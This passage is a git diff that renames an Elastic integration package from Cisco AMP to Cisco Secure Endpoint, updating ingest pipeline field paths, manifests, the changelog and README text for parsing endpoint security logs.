-description: This Elastic integration collects logs from Cisco AMP network devices
-type: integration
-categories:
-  - network
-  - security
-release: experimental
-conditions:
-  kibana.version: "^7.16.0"
-icons:
-  - src: /img/cisco.svg
-    title: cisco
-    size: 216x216
-    type: image/svg+xml
-policy_templates:
-  - name: cisco_amp
-    title: Cisco AMP logs
-    description: Collect logs from Cisco AMP
-    inputs:
-      - type: httpjson
-        title: Collect logs from Cisco AMP API
-        description: Collecting logs from Cisco AMP API
-owner:
-  github: elastic/security-external-integrations
diff --git a/packages/cisco_amp/_dev/build/build.yml b/packages/cisco_secure_endpoint/_dev/build/build.yml
similarity index 100%
rename from packages/cisco_amp/_dev/build/build.yml
rename to packages/cisco_secure_endpoint/_dev/build/build.yml
diff --git a/packages/cisco_secure_endpoint/_dev/build/docs/README.md b/packages/cisco_secure_endpoint/_dev/build/docs/README.md
new file mode 100644
index 00000000000..ed51d2fb1c3
--- /dev/null
+++ b/packages/cisco_secure_endpoint/_dev/build/docs/README.md
@@ -0,0 +1,16 @@
+# Cisco Secure Endpoint Integration
+
+This integration is for Cisco Secure Endpoint logs. It includes the following
+datasets for receiving logs over syslog or read from a file:
+
+- `log` dataset: supports Cisco Secure Endpoint logs.
+
+## Logs
+
+### Secure Endpoint
+
+The `log` dataset collects Cisco Secure Endpoint logs.
+
+{{event "log"}}
+
+{{fields "log"}}
diff --git a/packages/cisco_amp/_dev/deploy/docker/docker-compose.yml b/packages/cisco_secure_endpoint/_dev/deploy/docker/docker-compose.yml
similarity index 91%
rename from packages/cisco_amp/_dev/deploy/docker/docker-compose.yml
rename to packages/cisco_secure_endpoint/_dev/deploy/docker/docker-compose.yml
index a438beca546..066c8b4bd39 100644
--- a/packages/cisco_amp/_dev/deploy/docker/docker-compose.yml
+++ b/packages/cisco_secure_endpoint/_dev/deploy/docker/docker-compose.yml
@@ -1,6 +1,6 @@
 version: '2.3'
 services:
-  amp:
+  cisco_secure_endpoint:
     image: docker.elastic.co/observability/stream:v0.5.0
     ports:
       - 8080
diff --git a/packages/cisco_amp/_dev/deploy/docker/files/config.yml b/packages/cisco_secure_endpoint/_dev/deploy/docker/files/config.yml
similarity index 100%
rename from packages/cisco_amp/_dev/deploy/docker/files/config.yml
rename to packages/cisco_secure_endpoint/_dev/deploy/docker/files/config.yml
diff --git a/packages/cisco_amp/changelog.yml b/packages/cisco_secure_endpoint/changelog.yml
similarity index 90%
rename from packages/cisco_amp/changelog.yml
rename to packages/cisco_secure_endpoint/changelog.yml
index 5a5fc28efef..a4992dc5226 100644
--- a/packages/cisco_amp/changelog.yml
+++ b/packages/cisco_secure_endpoint/changelog.yml
@@ -1,5 +1,5 @@
 # newer versions go on top
-- version: "0.0.1"
+- version: "0.1.0"
   changes:
     - description: Initial migration from Filebeat Module
       type: enhancement
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp1.log b/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp1.log
similarity index 100%
rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp1.log
rename to packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp1.log
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp1.log-expected.json b/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp1.log-expected.json
similarity index 100%
rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp1.log-expected.json
rename to packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp1.log-expected.json
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp2.log b/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp2.log
similarity index 100%
rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp2.log
rename to packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp2.log
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp2.log-expected.json b/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp2.log-expected.json
similarity index 100%
rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp2.log-expected.json
rename to packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp2.log-expected.json
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp3.log b/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp3.log
similarity index 100%
rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp3.log
rename to packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp3.log
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp3.log-expected.json b/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp3.log-expected.json
similarity index 100%
rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp3.log-expected.json
rename to packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp3.log-expected.json
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp4.log b/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp4.log
similarity index 100%
rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp4.log
rename to packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp4.log
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp4.log-expected.json b/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp4.log-expected.json
similarity index 100%
rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp4.log-expected.json
rename to packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp4.log-expected.json
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp5.log b/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp5.log
similarity index 100%
rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp5.log
rename to packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp5.log
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp5.log-expected.json b/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp5.log-expected.json
similarity index 100%
rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp5.log-expected.json
rename to packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp5.log-expected.json
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp6.log b/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp6.log
similarity index 100%
rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp6.log
rename to packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp6.log
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp6.log-expected.json b/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp6.log-expected.json
similarity index 100%
rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp6.log-expected.json
rename to packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp6.log-expected.json
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp7.log b/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp7.log
similarity index 100%
rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp7.log
rename to packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp7.log
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp7.log-expected.json b/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp7.log-expected.json
similarity index 100%
rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp7.log-expected.json
rename to packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp7.log-expected.json
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-common-config.yml b/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-common-config.yml
similarity index 100%
rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-common-config.yml
rename to packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-common-config.yml
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/system/test-default-config.yml b/packages/cisco_secure_endpoint/data_stream/log/_dev/test/system/test-default-config.yml
similarity index 87%
rename from packages/cisco_amp/data_stream/log/_dev/test/system/test-default-config.yml
rename to packages/cisco_secure_endpoint/data_stream/log/_dev/test/system/test-default-config.yml
index 1d250dd622a..0b7cb39fbaf 100644
--- a/packages/cisco_amp/data_stream/log/_dev/test/system/test-default-config.yml
+++ b/packages/cisco_secure_endpoint/data_stream/log/_dev/test/system/test-default-config.yml
@@ -1,5 +1,5 @@
 input: httpjson
-service: amp
+service: cisco_secure_endpoint
 vars: ~
 data_stream:
   vars:
diff --git a/packages/cisco_amp/data_stream/log/agent/stream/httpjson.yml.hbs b/packages/cisco_secure_endpoint/data_stream/log/agent/stream/httpjson.yml.hbs
similarity index 100%
rename from packages/cisco_amp/data_stream/log/agent/stream/httpjson.yml.hbs
rename to packages/cisco_secure_endpoint/data_stream/log/agent/stream/httpjson.yml.hbs
diff --git a/packages/cisco_amp/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_secure_endpoint/data_stream/log/elasticsearch/ingest_pipeline/default.yml
similarity index 62%
rename from packages/cisco_amp/data_stream/log/elasticsearch/ingest_pipeline/default.yml
rename to packages/cisco_secure_endpoint/data_stream/log/elasticsearch/ingest_pipeline/default.yml
index 0deeae80697..de81b74bce5 100644
--- a/packages/cisco_amp/data_stream/log/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/cisco_secure_endpoint/data_stream/log/elasticsearch/ingest_pipeline/default.yml
@@ -1,5 +1,5 @@
 ---
-description: Pipeline for parsing Cisco AMP logs
+description: Pipeline for parsing Cisco Secure Endpoint logs
 processors:
 - rename:
     field: message
@@ -14,10 +14,10 @@ processors:
 #########################
 - rename:
     field: json.data
-    target_field: cisco.amp
+    target_field: cisco.secure_endpoint
     ignore_missing: true
 - date:
-    field: cisco.amp.timestamp
+    field: cisco.secure_endpoint.timestamp
     formats:
       - UNIX
     ignore_failure: true
@@ -35,64 +35,64 @@ processors:
     field: event.kind
     value: alert
 - convert:
-    field: cisco.amp.id
+    field: cisco.secure_endpoint.id
     target_field: event.id
     type: string
     ignore_missing: true
 - append:
     field: event.category
     value: file
-    if: ctx?.cisco?.amp?.file?.file_name != null
+    if: ctx?.cisco?.secure_endpoint?.file?.file_name != null
 - append:
     field: event.category
     value: malware
-    if: 'ctx?.cisco?.amp?.file?.disposition == "Malicious"'
+    if: 'ctx?.cisco?.secure_endpoint?.file?.disposition == "Malicious"'
 - rename:
-    field: cisco.amp.event_type
+    field: cisco.secure_endpoint.event_type
     target_field: event.action
     ignore_missing: true
 - set:
     field: event.severity
     value: 1
-    if: ctx?.cisco?.amp?.severity == 'Low'
+    if: ctx?.cisco?.secure_endpoint?.severity == 'Low'
 - set:
     field: event.severity
     value: 2
-    if: ctx?.cisco?.amp?.severity == 'Medium'
+    if: ctx?.cisco?.secure_endpoint?.severity == 'Medium'
 - set:
     field: event.severity
     value: 3
-    if: ctx?.cisco?.amp?.severity == 'High'
+    if: ctx?.cisco?.secure_endpoint?.severity == 'High'
 - set:
     field: event.severity
     value: 4
-    if: ctx?.cisco?.amp?.severity == 'Critical'
+    if: ctx?.cisco?.secure_endpoint?.severity == 'Critical'
 - set:
     field: event.severity
     value: 0
-    if: ctx?.cisco?.amp?.severity == null
+    if: ctx?.cisco?.secure_endpoint?.severity == null
 - date:
-    field: cisco.amp.start_timestamp
+    field: cisco.secure_endpoint.start_timestamp
     target_field: event.start
     formats: 
       - UNIX
     ignore_failure: true
-    if: ctx?.cisco?.amp?.start_timestamp != null
+    if: ctx?.cisco?.secure_endpoint?.start_timestamp != null
 
 - rename:
-    field: cisco.amp.techniques
-    target_field: cisco.amp.mitre_techniques
-    if: "ctx?.cisco?.amp?.techniques != null && ctx?.cisco?.amp?.techniques.length > 0 && ctx?.cisco?.amp?.techniques[0] instanceof String"
+    field: cisco.secure_endpoint.techniques
+    target_field: cisco.secure_endpoint.mitre_techniques
+    if: "ctx?.cisco?.secure_endpoint?.techniques != null && ctx?.cisco?.secure_endpoint?.techniques.length > 0 && ctx?.cisco?.secure_endpoint?.techniques[0] instanceof String"
 - rename:
-    field: cisco.amp.tactics
-    target_field: cisco.amp.mitre_tactics
-    if: "ctx?.cisco?.amp?.tactics != null && ctx?.cisco?.amp?.tactics.length > 0 && ctx?.cisco?.amp?.tactics[0] instanceof String"
+    field: cisco.secure_endpoint.tactics
+    target_field: cisco.secure_endpoint.mitre_tactics
+    if: "ctx?.cisco?.secure_endpoint?.tactics != null && ctx?.cisco?.secure_endpoint?.tactics.length > 0 && ctx?.cisco?.secure_endpoint?.tactics[0] instanceof String"
 
 ######################
 ## ECS Host Mapping ##
 ######################
 - rename:
-    field: cisco.amp.computer.hostname
+    field: cisco.secure_endpoint.computer.hostname
     target_field: host.name
     ignore_missing: true
 - set:
@@ -100,7 +100,7 @@ processors:
     value: "{{ host.name }}"
     if: ctx?.host?.name != null
 - rename:
-    field: cisco.amp.computer.user
+    field: cisco.secure_endpoint.computer.user
     target_field: host.user.name
     ignore_missing: true
 
@@ -108,29 +108,29 @@ processors:
 ## ECS Network Mapping ##
 #########################
 - rename:
-    field: cisco.amp.network_info.nfm.protocol
+    field: cisco.secure_endpoint.network_info.nfm.protocol
     target_field: network.transport
     ignore_missing: true
 - set:
     field: network.direction
     value: egress
-    if: "ctx?.cisco?.amp?.network_info?.nfm?.direction == 'Outgoing connection from'"
+    if: "ctx?.cisco?.secure_endpoint?.network_info?.nfm?.direction == 'Outgoing connection from'"
 - set:
     field: network.direction
     value: ingress
-    if: "ctx?.cisco?.amp?.network_info?.nfm?.direction != null && ctx?.cisco?.amp?.network_info?.nfm?.direction != 'Outgoing connection from'"
+    if: "ctx?.cisco?.secure_endpoint?.network_info?.nfm?.direction != null && ctx?.cisco?.secure_endpoint?.network_info?.nfm?.direction != 'Outgoing connection from'"
 
 #####################
 ## ECS URL Mapping ##
 #####################
 - uri_parts:
-    field: cisco.amp.network_info.dirty_url
+    field: cisco.secure_endpoint.network_info.dirty_url
     target_field: url
     keep_original: true
     remove_if_successful: true
-    if: ctx?.cisco?.amp?.network_info?.dirty_url != null
+    if: ctx?.cisco?.secure_endpoint?.network_info?.dirty_url != null
 - rename:
-    field: cisco.amp.network_info.dirty_url
+    field: cisco.secure_endpoint.network_info.dirty_url
     target_field: url.original
     ignore_missing: true
 
@@ -138,11 +138,11 @@ processors:
 ## ECS Source Mapping ##
 ########################
 - rename:
-    field: cisco.amp.network_info.local_ip
+    field: cisco.secure_endpoint.network_info.local_ip
     target_field: source.ip
     ignore_missing: true
 - rename:
-    field: cisco.amp.network_info.local_port
+    field: cisco.secure_endpoint.network_info.local_port
     target_field: source.port
     ignore_missing: true
 
@@ -150,11 +150,11 @@ processors:
 ## ECS Destination Mapping ##
 #############################
 - rename:
-    field: cisco.amp.network_info.remote_ip
+    field: cisco.secure_endpoint.network_info.remote_ip
     target_field: destination.ip
     ignore_missing: true
 - rename:
-    field: cisco.amp.network_info.remote_port
+    field: cisco.secure_endpoint.network_info.remote_port
     target_field: destination.port
     ignore_missing: true
 
@@ -162,23 +162,23 @@ processors:
 ## ECS File Mapping ##
 ######################
 - rename:
-    field: cisco.amp.file.file_name
+    field: cisco.secure_endpoint.file.file_name
     target_field: file.name
     ignore_missing: true
 - rename:
-    field: cisco.amp.file.file_path
+    field: cisco.secure_endpoint.file.file_path
     target_field: file.path
     ignore_missing: true
 - rename:
-    field: cisco.amp.file.identity.sha256
+    field: cisco.secure_endpoint.file.identity.sha256
     target_field: file.hash.sha256
     ignore_missing: true
 - rename:
-    field: cisco.amp.file.identity.sha1
+    field: cisco.secure_endpoint.file.identity.sha1
     target_field: file.hash.sha1
     ignore_missing: true
 - rename:
-    field: cisco.amp.file.identity.md5
+    field: cisco.secure_endpoint.file.identity.md5
     target_field: file.hash.md5
     ignore_missing: true
 
@@ -198,47 +198,47 @@ processors:
 ## ECS Process Mapping ##
 #########################
 - rename:
-    field: cisco.amp.file.parent.process_id
+    field: cisco.secure_endpoint.file.parent.process_id
     target_field: process.pid
     ignore_missing: true
 - rename:
-    field: cisco.amp.network_info.parent.process_id
+    field: cisco.secure_endpoint.network_info.parent.process_id
     target_field: process.pid
     ignore_missing: true
 - rename:
-    field: cisco.amp.file.parent.file_name
+    field: cisco.secure_endpoint.file.parent.file_name
     target_field: process.name
     ignore_missing: true
 - rename:
-    field: cisco.amp.file.parent.identity.sha256
+    field: cisco.secure_endpoint.file.parent.identity.sha256
     target_field: process.hash.sha256
     ignore_missing: true
 - rename:
-    field: cisco.amp.file.parent.identity.sha1
+    field: cisco.secure_endpoint.file.parent.identity.sha1
     target_field: process.hash.sha1
     ignore_missing: true
 - rename:
-    field: cisco.amp.file.parent.identity.md5
+    field: cisco.secure_endpoint.file.parent.identity.md5
     target_field: process.hash.md5
     ignore_missing: true
 - rename:
-    field: cisco.amp.file.parent.identity.md5
+    field: cisco.secure_endpoint.file.parent.identity.md5
     target_field: process.hash.md5
     ignore_missing: true
 - rename:
-    field: cisco.amp.network_info.parent.file_name
+    field: cisco.secure_endpoint.network_info.parent.file_name
     target_field: process.name
     ignore_missing: true
 - rename:
-    field: cisco.amp.network_info.parent.identity.sha256
+    field: cisco.secure_endpoint.network_info.parent.identity.sha256
     target_field: process.hash.sha256
     ignore_missing: true
 - rename:
-    field: cisco.amp.network_info.parent.identity.sha1
+    field: cisco.secure_endpoint.network_info.parent.identity.sha1
     target_field: process.hash.sha1
     ignore_missing: true
 - rename:
-    field: cisco.amp.network_info.parent.identity.md5
+    field: cisco.secure_endpoint.network_info.parent.identity.md5
     target_field: process.hash.md5
     ignore_missing: true
 
@@ -282,18 +282,18 @@ processors:
     allow_duplicates: false
 - append:
     field: related.hash
-    value: "{{ cisco.amp.network_info.parent.identity.sha256 }}"
-    if: ctx?.cisco?.amp?.network_info?.parent?.identity?.sha256 != null
+    value: "{{ cisco.secure_endpoint.network_info.parent.identity.sha256 }}"
+    if: ctx?.cisco?.secure_endpoint?.network_info?.parent?.identity?.sha256 != null
     allow_duplicates: false
 - append:
     field: related.hash
-    value: "{{ cisco.amp.network_info.parent.identity.md5 }}"
-    if: ctx?.cisco?.amp?.network_info?.parent?.identity?.md5 != null
+    value: "{{ cisco.secure_endpoint.network_info.parent.identity.md5 }}"
+    if: ctx?.cisco?.secure_endpoint?.network_info?.parent?.identity?.md5 != null
     allow_duplicates: false
 - append:
     field: related.hash
-    value: "{{ cisco.amp.network_info.parent.identity.sha1 }}"
-    if: ctx?.cisco?.amp?.network_info?.parent?.identity?.sha1 != null
+    value: "{{ cisco.secure_endpoint.network_info.parent.identity.sha1 }}"
+    if: ctx?.cisco?.secure_endpoint?.network_info?.parent?.identity?.sha1 != null
     allow_duplicates: false
 - append:
     field: related.hosts
@@ -312,8 +312,8 @@ processors:
     allow_duplicates: false
 - append:
     field: related.ip
-    value: "{{ cisco.amp.computer.external_ip }}"
-    if: ctx?.cisco?.amp?.computer?.external_ip != null
+    value: "{{ cisco.secure_endpoint.computer.external_ip }}"
+    if: ctx?.cisco?.secure_endpoint?.computer?.external_ip != null
     allow_duplicates: false
 - script:
     lang: painless
@@ -324,39 +324,39 @@ processors:
         if (ctx?.related?.ip == null) {
             ctx.related.ip = new ArrayList();
         }
-        for (addr in ctx?.cisco?.amp?.computer?.network_addresses) {
+        for (addr in ctx?.cisco?.secure_endpoint?.computer?.network_addresses) {
             if (addr.ip != null && !addr.ip.isEmpty()) {
                 if (!ctx?.related?.ip.contains(addr.ip)) {
                     ctx?.related?.ip.add(addr.ip);  
                 }
             }
         }
-    if: ctx?.cisco?.amp?.computer?.network_addresses != null
+    if: ctx?.cisco?.secure_endpoint?.computer?.network_addresses != null
 - script:
     lang: painless
     source: |
-        if (ctx?.cisco?.amp?.related == null) {
-            ctx.cisco.amp.related = new HashMap();
+        if (ctx?.cisco?.secure_endpoint?.related == null) {
+            ctx.cisco.secure_endpoint.related = new HashMap();
         }
-        if (ctx?.cisco?.amp?.related?.mac == null) {
-            ctx.cisco.amp.related.mac = new ArrayList();
+        if (ctx?.cisco?.secure_endpoint?.related?.mac == null) {
+            ctx.cisco.secure_endpoint.related.mac = new ArrayList();
         }
-        for (addr in ctx?.cisco?.amp?.computer?.network_addresses) {
+        for (addr in ctx?.cisco?.secure_endpoint?.computer?.network_addresses) {
             if (addr.mac != null && !addr.mac.isEmpty()) {
-                if (!ctx?.cisco?.amp?.related?.mac.contains(addr.mac)) {
-                    ctx?.cisco?.amp?.related?.mac.add(addr.mac);  
+                if (!ctx?.cisco?.secure_endpoint?.related?.mac.contains(addr.mac)) {
+                    ctx?.cisco?.secure_endpoint?.related?.mac.add(addr.mac);  
                 }
             }
         }
-    if: ctx?.cisco?.amp?.computer?.network_addresses != null
+    if: ctx?.cisco?.secure_endpoint?.computer?.network_addresses != null
 - foreach:
-    field: cisco.amp.vulnerabilities
+    field: cisco.secure_endpoint.vulnerabilities
     processor:
       append:
-        field: cisco.amp.related.cve
+        field: cisco.secure_endpoint.related.cve
         value: "{{ _ingest._value.cve }}"
         allow_duplicates: false
-    if: ctx?.cisco?.amp?.vulnerabilities != null
+    if: ctx?.cisco?.secure_endpoint?.vulnerabilities != null
 
 #############
 ## GeoIP ##
@@ -408,19 +408,19 @@ processors:
 ## Cleanup ##
 #############
 - date:
-    field: cisco.amp.threat_hunting.incident_start_time
-    target_field: cisco.amp.threat_hunting.incident_start_time
+    field: cisco.secure_endpoint.threat_hunting.incident_start_time
+    target_field: cisco.secure_endpoint.threat_hunting.incident_start_time
     formats: 
       - UNIX
     ignore_failure: true
-    if: ctx?.cisco?.amp?.threat_hunting?.incident_start_time != null
+    if: ctx?.cisco?.secure_endpoint?.threat_hunting?.incident_start_time != null
 - date:
-    field: cisco.amp.threat_hunting.incident_end_time
-    target_field: cisco.amp.threat_hunting.incident_end_time
+    field: cisco.secure_endpoint.threat_hunting.incident_end_time
+    target_field: cisco.secure_endpoint.threat_hunting.incident_end_time
     formats: 
       - UNIX
     ignore_failure: true
-    if: ctx?.cisco?.amp?.threat_hunting?.incident_end_time != null
+    if: ctx?.cisco?.secure_endpoint?.threat_hunting?.incident_end_time != null
 - script:
     lang: painless
     description: This script processor iterates over the whole document to remove fields with null values.
@@ -453,15 +453,15 @@ processors:
     ignore_missing: true
 - remove:
     field:
-    - cisco.amp.timestamp
-    - cisco.amp.computer.links
+    - cisco.secure_endpoint.timestamp
+    - cisco.secure_endpoint.computer.links
     - json
-    - cisco.amp.severity
-    - cisco.amp.start_timestamp
-    - cisco.amp.date
-    - cisco.amp.timestamp_nanoseconds
-    - cisco.amp.start_date
-    - cisco.amp.id
+    - cisco.secure_endpoint.severity
+    - cisco.secure_endpoint.start_timestamp
+    - cisco.secure_endpoint.date
+    - cisco.secure_endpoint.timestamp_nanoseconds
+    - cisco.secure_endpoint.start_date
+    - cisco.secure_endpoint.id
     ignore_missing: true
 on_failure:
 - set:
diff --git a/packages/cisco_amp/data_stream/log/fields/agent.yml b/packages/cisco_secure_endpoint/data_stream/log/fields/agent.yml
similarity index 100%
rename from packages/cisco_amp/data_stream/log/fields/agent.yml
rename to packages/cisco_secure_endpoint/data_stream/log/fields/agent.yml
diff --git a/packages/cisco_amp/data_stream/log/fields/base-fields.yml b/packages/cisco_secure_endpoint/data_stream/log/fields/base-fields.yml
similarity index 94%
rename from packages/cisco_amp/data_stream/log/fields/base-fields.yml
rename to packages/cisco_secure_endpoint/data_stream/log/fields/base-fields.yml
index 51e5fe98f8e..777171a4af1 100644
--- a/packages/cisco_amp/data_stream/log/fields/base-fields.yml
+++ b/packages/cisco_secure_endpoint/data_stream/log/fields/base-fields.yml
@@ -13,11 +13,11 @@
 - name: event.module
   type: constant_keyword
   description: Event module
-  value: cisco_amp
+  value: cisco_secure_endpoint
 - name: event.dataset
   type: constant_keyword
   description: Event dataset
-  value: cisco_amp.log
+  value: cisco_secure_endpoint.log
 - name: container.id
   description: Unique container id.
   ignore_above: 1024
diff --git a/packages/cisco_amp/data_stream/log/fields/ecs.yml b/packages/cisco_secure_endpoint/data_stream/log/fields/ecs.yml
similarity index 100%
rename from packages/cisco_amp/data_stream/log/fields/ecs.yml
rename to packages/cisco_secure_endpoint/data_stream/log/fields/ecs.yml
diff --git a/packages/cisco_amp/data_stream/log/fields/fields.yml b/packages/cisco_secure_endpoint/data_stream/log/fields/fields.yml
similarity index 99%
rename from packages/cisco_amp/data_stream/log/fields/fields.yml
rename to packages/cisco_secure_endpoint/data_stream/log/fields/fields.yml
index e67370745fb..e07fffbd0b5 100644
--- a/packages/cisco_amp/data_stream/log/fields/fields.yml
+++ b/packages/cisco_secure_endpoint/data_stream/log/fields/fields.yml
@@ -1,9 +1,9 @@
-- name: cisco.amp
+- name: cisco.secure_endpoint
   type: group
   release: beta
   default_field: false
   description: >
-    Module for parsing Cisco AMP logs.
+    Module for parsing Cisco Secure Endpoint logs.
 
   fields:
     - name: timestamp_nanoseconds
diff --git a/packages/cisco_amp/data_stream/log/manifest.yml b/packages/cisco_secure_endpoint/data_stream/log/manifest.yml
similarity index 90%
rename from packages/cisco_amp/data_stream/log/manifest.yml
rename to packages/cisco_secure_endpoint/data_stream/log/manifest.yml
index 7eef1317b6d..65d64108127 100644
--- a/packages/cisco_amp/data_stream/log/manifest.yml
+++ b/packages/cisco_secure_endpoint/data_stream/log/manifest.yml
@@ -1,4 +1,4 @@
-title: Cisco AMP logs
+title: Cisco Secure Endpoint logs
 release: experimental
 type: logs
 streams:
@@ -7,14 +7,14 @@ streams:
       - name: client_id
         type: text
         title: Client ID
-        description: Cisco AMP Client ID
+        description: Cisco Secure Endpoint Client ID
         multi: false
         required: true
         show_user: true
       - name: api_key
         type: password
         title: API Key
-        description: Cisco AMP API Key
+        description: Cisco Secure Endpoint API Key
         multi: false
         required: true
         show_user: true
@@ -70,7 +70,7 @@ streams:
         required: true
         show_user: true
         default:
-          - cisco-amp
+          - cisco-secure_endpoint
           - forwarded
       - name: preserve_original_event
         required: true
@@ -88,5 +88,5 @@ streams:
         show_user: false
         description: "Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. \nThis executes in the agent before the logs are parsed. \nSee [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details.\n"
     template_path: httpjson.yml.hbs
-    title: Cisco AMP logs
-    description: Collect Cisco AMP logs via the API
+    title: Cisco Secure Endpoint logs
+    description: Collect Cisco Secure Endpoint logs via the API
diff --git a/packages/cisco_amp/data_stream/log/sample_event.json b/packages/cisco_secure_endpoint/data_stream/log/sample_event.json
similarity index 100%
rename from packages/cisco_amp/data_stream/log/sample_event.json
rename to packages/cisco_secure_endpoint/data_stream/log/sample_event.json
diff --git a/packages/cisco_amp/docs/README.md b/packages/cisco_secure_endpoint/docs/README.md
similarity index 68%
rename from packages/cisco_amp/docs/README.md
rename to packages/cisco_secure_endpoint/docs/README.md
index 334ebbae376..fdb900ec77c 100644
--- a/packages/cisco_amp/docs/README.md
+++ b/packages/cisco_secure_endpoint/docs/README.md
@@ -1,15 +1,15 @@
-# Cisco AMP Integration
+# Cisco Secure Endpoint Integration
 
-This integration is for Cisco AMP logs. It includes the following
+This integration is for Cisco Secure Endpoint logs. It includes the following
 datasets for receiving logs over syslog or read from a file:
 
-- `log` dataset: supports Cisco AMP logs.
+- `log` dataset: supports Cisco Secure Endpoint logs.
 
 ## Logs
 
-### AMP
+### Secure Endpoint
 
-The `log` dataset collects Cisco AMP logs.
+The `log` dataset collects Cisco Secure Endpoint logs.
 
 An example event for `log` looks as following:
 
@@ -96,63 +96,63 @@ An example event for `log` looks as following:
 | Field | Description | Type |
 |---|---|---|
 | @timestamp | Date/time when the event originated. This is the date/time extracted from the event, typically representing when the event was generated by the source. If the event source has no original timestamp, this value is typically populated by the first time the event was received by the pipeline. Required field for all events. | date |
-| cisco.amp.bp_data | Endpoint isolation information | flattened |
-| cisco.amp.cloud_ioc.description | Description of the related IOC for specific IOC events from AMP. | keyword |
-| cisco.amp.cloud_ioc.short_description | Short description of the related IOC for specific IOC events from AMP. | keyword |
-| cisco.amp.command_line.arguments | The CLI arguments related to the Cloud Threat IOC reported by Cisco. | keyword |
-| cisco.amp.computer.active | If the current endpoint is active or not. | boolean |
-| cisco.amp.computer.connector_guid | The GUID of the connector, similar to top level connector_guid, but unique if multiple connectors are involved. | keyword |
-| cisco.amp.computer.external_ip | The external IP of the related host. | ip |
-| cisco.amp.computer.network_addresses | All network interface information on the related host. | flattened |
-| cisco.amp.connector_guid | The GUID of the connector sending information to AMP. | keyword |
-| cisco.amp.detection | The name of the malware detected. | keyword |
-| cisco.amp.detection_id | The ID of the detection. | keyword |
-| cisco.amp.error.description | Description of an endpoint error event. | keyword |
-| cisco.amp.error.error_code | The error code describing the related error event. | long |
-| cisco.amp.event_type_id | A sub ID of the event, depending on event type. | long |
